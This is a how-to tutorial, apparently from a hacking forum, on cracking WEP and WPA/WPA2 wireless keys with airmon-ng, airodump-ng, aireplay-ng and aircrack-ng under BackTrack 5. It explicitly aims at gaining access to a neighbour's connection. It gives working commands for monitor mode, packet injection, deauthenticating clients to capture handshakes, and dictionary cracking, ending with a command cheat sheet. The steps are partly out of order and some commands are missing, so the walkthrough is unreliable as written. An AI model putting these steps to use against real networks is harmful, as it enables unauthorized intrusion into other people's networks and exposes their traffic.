Hello and welcome to my tutorial about wireless networking.
Today I'll be teaching you how easy it is to obtain access to a wireless protected network.
There are lots of questions coming from the beginners on how to crack WEP/WPA/WPA2 keys and accessing their neighbor's connection. The purpose of this tutorial is to answer them.
Judging from the "tutorials" on youtube which are either obsolete, or simply misguiding the listeners, this tutorial will be different.
I will be covering all of the aspects and ways of hacking a network and gaining access to the router.
This tutorial will be divided in 2 parts, such as WEP and WPA/WPA2 hacking. Please read below on what you need to succeed.
What you need for this crack are a few simple things, a copy of backtrack 5 booting off a DVD or a flash drive and a compatible wireless card that supports packet injection.
Now if you can't get to this screen, and you are stuck at the terminal you get when booting into backtrack, you need to type startx and wait a couple of minutes for the desktop to show.
Okay so let's begin, so first we need to open a terminal. To do that, just click the little icon that's on the right side from System. Please see the image below:
Type airodump-ng mon0 and that will start scanning for wi-fi networks. As you can see, there is a network called SKIDHACKER. Take a note of the BSSID the DATA, the CHANNEL and the type of ENCRYPTION. Please refer to the image below, if you have any trouble getting to that point.
Now we are going to set it to lock on a specific network named SKIDHACKER. To do that, type airodump-ng -c (channel) -w WEPcrack --bssid (bssid of the network) mon0. Replace (channel) with the channel of the network you are trying to crack, and replace (bssid of the network) with the bssid of the network you want to crack.
Now we are going to type in aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0. And now when the question Use this packet ? pops up, just push the letter y. And now as you can see in the image below, the data went high drastically.
Okay so now lets open a new terminal and we are going to attempt to crack it with the amount of data we have. I recommend getting over 20000 data before trying to crack it. So let's type aircrack-ng WEPcrack*.cap. Replace WEPcrack with the filename you chose before when capturing the data, and don't forget to add that asterisk after the file and the extension which is .cap.
In my case I have wlan0, and now we are going to put it into monitor mode.
To do that, type airmon-ng start wlan0. As you can see on the picture below it says (monitor mode enabled on mon0), and we are going to be using mon0 instead of wlan0 as our interface.
So now that we have a wpa handshake file, we are going to attempt to crack it. Lets stop the scan by pressing CONTROL + C on the terminal where airodump is running. Now in order to find the handshake file, you need to go in the top menu and chose Places > Home Folder. Okay, so lets open up a terminal and we are going to type in aircrack-ng -w (dictionary) /root/(filename). Where filename is the filename you specified when capturing the wpa handshake and the dictionary is the path of the wordlist you downloaded. This can be done by dragging in the handshake file into the terminal after the aircrack-ng -w (dictionary) command and it will parse in it's directory. All you need to do is hit enter. The password needs to be in the dictionary file, so the bigger the wordlist is the bigger are the chances of you getting the password.
This command displays the wireless interfaces.
airmon-ng start wlan0
This command starts monitoring mode on a wi-fi device.
This command shows all of the wi-fi networks online.
airodump-ng -c (channel) -w (filename) --bssid (bssid) mon0
This command specifies the wi-fi device to concentrate to one network.
aireplay-ng -1 0 -a (bssid) mon0
This command kicks off clients that are connected, and gets the handshake.
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0
This command boosts the data, when cracking WEP.
aircrack-ng -w (dictionary) (wpa handshake)
This command is used when cracking WPA or WPA2 networks.
This command is used when cracking WEP networks.
These were the commands I used in the whole guide.